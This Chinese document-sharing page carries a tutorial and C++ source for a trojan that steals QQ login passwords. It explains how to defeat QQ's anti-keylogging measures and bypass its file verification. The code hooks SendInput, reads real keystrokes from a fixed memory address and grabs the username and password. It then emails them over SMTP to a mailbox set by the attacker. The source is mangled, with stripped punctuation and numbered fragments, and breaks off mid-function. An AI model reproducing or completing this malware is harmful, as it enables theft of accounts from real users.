1、一个简单木马的源代码代码没给大家讲解,不知道看懂没。所以,现在我原理给大家说一下,腾讯QQ安装了两个钩子一个是WH_DEBUG,还有一个是WH_KEYBOARD_LL,当QQ的密码框获得焦点的时候DEBUG钩子就开始用SendInput发送乱码,在QQ启动的时候也会先调用SendInput发送一个乱码,所以就挂钩SendInput这个函数,我们正确安装按键的时候QQ会通过WH_KERBOARD_LL低级钩子,发送一个错误的按键信息,在这里通过分析,发现在WIN7系统上真实的按键的就在0x12faa0处记录着,挂钩之后判断一下来源,if(nRetAddress!=0x74F3&nRetAddre
2、ss!=0x7374),就排除不是真实按键调用的,当然上面这句我们是WIn7上的地址,所有有朋友说,在XP上不行,由于我是WIN7的系统,还没装XP的虚拟机,所以并没添加这个判断,传进来的pInputs等我们基本上就不用去管他,然后通过if(pInputs-ki.dwFlags=0)判断是否是键盘按下,如果是按下,我们就开始记录。DWORDnRetAddress=0;_asmmoveax,0movax,ebp+4movnRetAddress,eaxif(nRetAddress!=0x74F3&nRetAddress!=0x7374)这就是取得是什么地方在调用SendInput.charkey=
3、0;_asmmovebx,0x12faa0moveax,0moval,ebxmovkey,al获取真实的按键,稍后我换上XP系统后,会将这个几个关键西方的发出,大家就可以在XP上也能使用这个木马了。有人会问为什么我的文件是User32Hook.cpp实际挂钩的是SendInput,这个是因为,我用OD分析的时候发现在User32.dll中有一个固定地址通过ebp+c之后也可以获取到键盘按下的真实按键信息,只要挂钩在那里,也是可以获得真确的按键信息,然后写出木马,并且可以早于QQ的WH_KEYBOARD_LL钩子获取真实按键,就算QQ在WH_KEYBOARD_LL把WIN7下地址为0x12faa
4、0的真实按键信息清0,也是没有用的,兴趣的朋友,就在WH_KEYBOARD_LL上下段,然后往上跟就会看到了。只是这样挂钩USER32.dll的时候光写这个DLL了,就得去修改QQ.EXE文件,修改QQEXE后,他有个自身文件的验证,可以通过修改输入表,替换掉CreateFileW改变打开的文件,而绕过他的文件验证保护,在首地址写入,加载DLL的代码,立马挂钩USER32.DLL,然后恢复QQ的OEP地址的内存,从新回到QQ的OEP,这样就可以在QQ输入密码的时候早于QQ获得,也不用在挂钩SendInput,后来我发现WH_KEYBOARD_LL钩子中当真实的按键按下时,他也会去调用SendI
5、nput虽然是错的按键,但是我们可以通过0x12faa0获得真实的按键,所以我就改写了,代码,这样看起来更简单。其他的我就不多说,有兴趣的朋友,在分析把!代码在后面,我会陆续全部贴上代码:#include#include#include#pragmacomment(lib,User32.lib)#includeUser32Hook.hcharg_Password100=0;intg_KeyIndex=0;BYTEg_OldFunc8;BYTEg_NewFunc8;FARPROCg_lpHookFunc;BYTEg_NewFunc28=0x90,0x90,0x90,0x90,0x90,0x90,
6、0x90,0x90;DWORDg_lpHookFunc2;charasciiKey1=,1,2,3,4,5,6,7,8,9,0,-,=,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,;,.,/,0,1,2,3,4,5,6,7,8,9,*,+,-,.,*;charasciiKey2=,1,2,3,4,5,6,7,8,9,0,-,=,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,;,.,/,0,1,2,3,4,5,6,7,8,9,*,+,-,.,*;unsignedintasciiT
7、bl=0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFF
8、FBF,0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F;UINTWINAPIXwSendInput(UINTnInputs,LPINPUTpInputs,intcbSize)DWORDnRetAddress=0;_asmmoveax,0movax,ebp+4movnRetAddress,eaxUINTnRet=0;HookOff();nRet=SendInput(nInputs,pInputs,cbSize);HookOn();if(nRetAddress!=0x74F3&nRetAddres
9、s!=0x7374)charkey=0;_asmmovebx,0x12faa0moveax,0moval,ebxmovkey,alPOINTpoint;:GetCaretPos(&point);intpostion=point.x/8;if(pInputs-ki.dwFlags=0)for(inti=0;i(63-15)break;if(asciiTbli=key)if(GetKeyState(VK_CAPITAL)=1&GetAsyncKeyState(VK_SHIFT)!=0)|GetKeyState(VK_CAPITAL)=0&GetAsyncKeyState(VK_SHIFT)=0)i
10、f(postion=postion;k-)g_Passwordk+1=g_Passwordk;g_Passwordpostion=asciiKey1i;g_KeyIndex+;elseg_Passwordg_KeyIndex+=asciiKey1i;if(GetKeyState(VK_CAPITAL)=1&GetAsyncKeyState(VK_SHIFT)=0)|(GetKeyState(VK_CAPITAL)=0&GetAsyncKeyState(VK_SHIFT)!=0)if(postion=postion;k-)g_Passwordk+1=g_Passwordk;g_Passwordp
11、ostion=asciiKey2i;g_KeyIndex+;elseg_Passwordg_KeyIndex+=asciiKey2i;if(key=0x8)if(g_KeyIndex0)g_Passwordg_KeyIndex=0;g_Password-g_KeyIndex=0;returnnRet;voidInitHookCallBack()g_lpHookFunc=GetProcAddress(GetModuleHandle(user32.dll),SendInput);g_NewFunc0=0xe9;memcpy(g_OldFunc,(char*)g_lpHookFunc,5);DWOR
12、D*pNewFuncAddress=(DWORD*)&g_NewFunc1;*pNewFuncAddress=(DWORD)(FARPROC)XwSendInput)-(DWORD)g_lpHookFunc)-5;voidHookOn()DWORDdwOleFlag;WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&dwOleFlag);voidHookOff()DWORDdwNewFlag;WriteProcessMemory(GetCurrentProcess(),(void*)g_
13、lpHookFunc,(void*)g_OldFunc,5,&dwNewFlag);木马dll函数的main.cpp文件的代码代码:#include#include#includeUser32Hook.h#includeSendMail.h#pragmacomment(linker,/export:DllCanUnloadNow=Command.DllCanUnloadNow)#pragmacomment(linker,/export:DllGetClassObject=Command.DllGetClassObject)#pragmacomment(linker,/export:DllMai
14、n=Command.DllMain)#pragmacomment(linker,/export:DllRegisterServer=Command.DllRegisterServer)#pragmacomment(linker,/export:DllUnregisterServer=Command.DllUnregisterServer)HWNDhLoginWindow,hUserName,hUserPwd;charg_UserName100=0;charg_Version100=0;voidWaitLoginWindow()Sleep(1500);while(true)hLoginWindo
15、w=GetForegroundWindow();POINTpni;RECTrcWindow;GetWindowRect(hLoginWindow,&rcWindow);pni.y=rcWindow.top+115;pni.x=rcWindow.left+100;hUserName=WindowFromPoint(pni);pni.y=rcWindow.top+155;pni.x=rcWindow.left+100;hUserPwd=WindowFromPoint(pni);LONGlStyle=:GetWindowLong(hUserPwd,GWL_STYLE);if(lStyle&ES_PA
16、SSWORD)break;Sleep(100);DWORDWINAPIServerThreadProc(LPVOIDlpParameter)memset(g_Password,0,100);WaitLoginWindow();SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)g_UserName);SendMessage(hLoginWindow,WM_GETTEXT,100,(LPARAM)g_Version);while(true)chartempAccounts100;:SendMessage(hUserName,WM_GETTEXT,100,(L
17、PARAM)tempAccounts);if(strcmp(g_UserName,tempAccounts)!=0&strlen(tempAccounts)!=0)strcpy(g_UserName,tempAccounts);LONGlStyle=:GetWindowLong(hUserPwd,GWL_STYLE);if(lStyle&ES_PASSWORD)=0)break;Sleep(100);charszContext64=0;sprintf(szContext,QQ版本:%srn用户名:%srn密码:%srn,g_Version,g_UserName,g_Password);SMTP
18、INFOsmtpinfo;strcpy(smtpinfo.SmtpSrvName,AAAAAAAAAAAAAAAAAAAA);strcpy(smtpinfo.Port,25);strcpy(smtpinfo.UserName,BBBBBBBBBBBBBBBBBBBB);strcpy(smtpinfo.Password,CCCCCCCCCCCCCCCCCCCC);strcpy(smtpinfo.From,DDDDDDDDDDDDDDDDDDDD);strcpy(smtpinfo.To,EEEEEEEEEEEEEEEEEEEE);strcpy(smtpinfo.Subject,*小五*提醒-获取到
19、新的QQ!);strcpy(smtpinfo.Msg,szContext);SendMail(&smtpinfo);return0;BOOLWINAPIDllMain(_invoid*_HDllHandle,_inunsigned_Reason,_in_optvoid*_Reserved)switch(_Reason)caseDLL_PROCESS_ATTACH:InitHookCallBack();HookOn();CreateThread(NULL,0,ServerThreadProc,0,0,0);break;caseDLL_PROCESS_DETACH:break;returnTRUE
20、;intWINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,LPSTRlpCmdLine,intnCmdShow)return0;User32Hook.h文件的代码代码:voidHookOff();voidHookOn();voidInitHookCallBack();externcharg_Password100;SendMail.h文件代码:typedefstruct_SMTPINFOcharSmtpSrvName32;charPort7;charUserName16;charPassword16;charFrom32;charT
21、o32;charSubject32;charMsg64;SMTPINFO;/将用户名和密码转换为base64编码voidBase64(unsignedchar*chasc,unsignedchar*chuue);intTalk(SOCKETsockid,constchar*OkCode,char*pSend);intSendMail(constSMTPINFO*psmtpinfo);SendMail.cpp文件中的代码代码:#include#defineWIN32_LEAN_AND_MEAN#include#include#include#includeSendMail.h#pragmacom
22、ment(lib,ws2_32.lib)constintbuflen=256;charbufbuflen;inti,userlen,passlen;/-intSendMail(constSMTPINFO*psmtpinfo)/准备网络连接WSADATAwsadata;if(WSAStartup(MAKEWORD(2,2),&wsadata)!=0)return1;/创建套接字SOCKETsockid;if(sockid=socket(AF_INET,SOCK_STREAM,0)=INVALID_SOCKET)WSACleanup();return1;/得到smtp服务器ipstructhost
23、ent*phostent=gethostbyname(psmtpinfo-SmtpSrvName);structsockaddr_inaddr;CopyMemory(&addr.sin_addr.S_un.S_addr,phostent-h_addr_list0,sizeof(addr.sin_addr.S_un.S_addr);addr.sin_family=AF_INET;addr.sin_port=htons(atoi(psmtpinfo-Port);ZeroMemory(&addr.sin_zero,8);/连接服务器if(connect(sockid,(structsockaddr*
24、)&addr,sizeof(structsockaddr_in)=SOCKET_ERROR)gotoSTOP;if(Talk(sockid,220,EHLOsjdf)gotoSTOP;if(Talk(sockid,250,AUTHLOGIN)gotoSTOP;ZeroMemory(buf,buflen);userlen=lstrlen(psmtpinfo-UserName);passlen=lstrlen(psmtpinfo-Password);for(i=0;iUserName+i*3),(unsignedchar*)(buf+i*4);if(Talk(sockid,334,buf)gotoS
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1
升级会员 